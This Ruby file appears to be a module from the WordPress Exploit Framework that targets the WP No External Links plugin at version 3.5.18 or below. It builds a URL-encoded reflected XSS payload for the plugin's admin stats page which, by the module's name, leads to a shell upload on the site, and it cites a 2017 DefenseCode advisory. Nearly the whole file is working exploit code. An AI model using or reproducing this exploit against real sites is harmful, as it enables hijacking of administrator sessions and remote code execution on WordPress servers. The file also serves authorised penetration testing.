# frozen_string_literal: true

class Wpxf::Exploit::NoExternalLinksReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss
  include ERB::Util

  def initialize
    super

    update_info(
      name: 'WP No External Links <= 3.5.18 Reflected XSS Shell Upload',
      author: [
        'DefenseCode', # Discovery
        'rastating'    # WPXF module
      ],
      references: [
        ['WPVDB', '8840'],
        ['URL', 'http://defensecode.com/advisories/DC-2017-01-022_WordPress_No_External_Links_Plugin_Advisory.pdf']
      ],
      date: 'May 31 2017'
    )
  end

  def check
    check_plugin_version_from_readme('wp-noexternallinks', '3.5.19')
  end

  def vulnerable_url
    normalize_uri(wordpress_url_admin, 'options-general.php')
  end

  def url_payload
    url_encode("\"><script>#{xss_ascii_encoded_include_script}</script>")
  end

  def url_with_xss
    "#{vulnerable_url}?page=wp-noexternallinks%2Fwp-noexternallinks-options.php&action=stats&date1=#{url_payload}"
  end
end
